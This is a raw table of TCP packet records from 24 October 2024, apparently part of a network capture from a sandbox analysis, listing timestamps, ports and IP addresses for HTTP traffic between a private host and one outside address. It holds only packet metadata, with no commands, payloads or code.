Oct 24, 2024 19:29:15.203860998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203871965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.203893900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203918934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203923941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.203939915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203948021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.203958035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203974009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.203989983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204001904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204008102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204042912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204071045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204092979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204108953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204123974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204145908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204147100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204155922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204165936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204175949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204210997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204227924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204242945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204257011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204272985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204283953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204289913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204304934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204344988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204379082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204394102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204433918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204461098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204511881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204526901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204544067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204560041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204562902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204572916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204576015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204592943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204607964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204618931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204628944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204657078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204673052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204734087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204857111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204871893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204886913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204898119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204901934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204920053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204935074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204945087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204952002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204967976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204977989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.204983950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.204999924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.205008030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.205015898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.205029964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.205059052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.205069065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.205107927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.362884045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363006115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363162041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363178015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363193989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363212109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363223076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363229036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363246918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363260984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363264084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363271952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363329887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363567114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363583088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363599062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363617897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363652945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363662004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363677025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363696098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363707066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363713026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363742113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363785028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363836050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363851070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363864899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363881111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363888025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363897085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363913059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363918066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363929987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363945007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363959074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.363962889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.363981962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364002943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364031076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364114046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364129066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364142895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364156961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364171982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364172935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364190102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364191055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364206076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364213943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364223003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364247084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364249945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364274025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364308119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364339113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364454985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364470005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364483118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364484072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364500999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364504099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364517927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364525080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364535093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364551067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364567041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364573002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364589930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364609957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364617109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364626884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364655018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364659071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364670038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364681005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364685059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364701033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364701986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364716053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364726067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364732027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364748001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364770889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364783049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364804029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364820957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364850044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364907026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364923000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364939928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364954948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364955902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364972115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.364980936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.364989042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365005970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365015030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365039110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365083933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365114927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365140915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365156889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365165949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365171909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365189075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365202904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365242004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365267038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365274906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365289927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365317106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365324020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365331888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365345001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365346909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365355968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365369081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365381002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365386009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365394115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365395069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365407944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365422964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365449905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365478039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365660906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365675926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365690947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365706921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365722895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365722895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365737915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365752935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365763903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365768909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365784883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365799904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365808010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365816116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365828991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365833044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365858078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365886927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365915060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365928888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365943909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365958929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365968943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.365974903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.365992069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366008043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366054058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366190910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366211891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366229057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366246939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366246939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366266012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366278887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366285086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366302013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366314888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366319895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.366342068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.366374969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.522730112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.522753000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.522798061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.522938013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.522980928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523000956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523019075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523036957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523194075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523197889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523197889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523197889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523197889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523210049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523231030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523248911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523250103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523281097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523293972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523299932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523338079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523351908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523360968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523371935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523391962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523401022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523426056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523430109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523446083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523457050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523464918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523478031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523484945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523504972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523508072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523530960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523550987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523554087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523575068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523580074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523592949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523612022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523627043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523633003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523652077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523667097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523695946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523751020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523770094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523789883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523799896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523840904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523894072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523911953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523931980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523941040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.523952007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523972034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.523983002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524022102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524049997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524068117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524085999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524094105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524105072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524123907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524137020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524148941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524168015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524178028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524203062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524235964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524427891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524446964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524465084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524471998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524482965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524497032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524502039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524519920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524535894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524544001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524554968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524574041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524581909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524622917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524630070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524647951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524672031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524714947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524822950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524842024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524858952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524867058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524878025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524890900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524898052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524916887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524919987 CEST	80	49730	185.215.113.37	192.168.2.4
